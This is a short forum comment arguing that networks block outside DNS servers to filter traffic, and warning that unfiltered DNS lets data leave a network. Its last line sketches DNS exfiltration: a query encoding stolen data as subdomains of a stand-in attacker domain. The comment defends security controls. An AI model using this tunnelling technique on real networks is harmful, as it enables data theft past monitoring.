|
|
|
|
|
|
by pixl97
2680 days ago
|
|
|
You do realize that many networks use DNS security products, right? These networks block all DNS traffic to 'random' DNS servers, including 8.8.8.8 to prevent any number of different attacks. The security device can examine the DNS packet and say 'youtube.com = allowed', or 'yourtube.com = not allowed'. It can also to the reverse "if youtube.com 'expected_ip_set' then allow". By requiring this device to use outside DNS servers you are punching holes in the network for no particularly valid reason. Unfiltered and uncontrolled DNS is a security risk. I can transmit all your company information out of your network easily with DNS queries. get a $UUENCODED_DATA.sequence_id.attack.com
|
|
|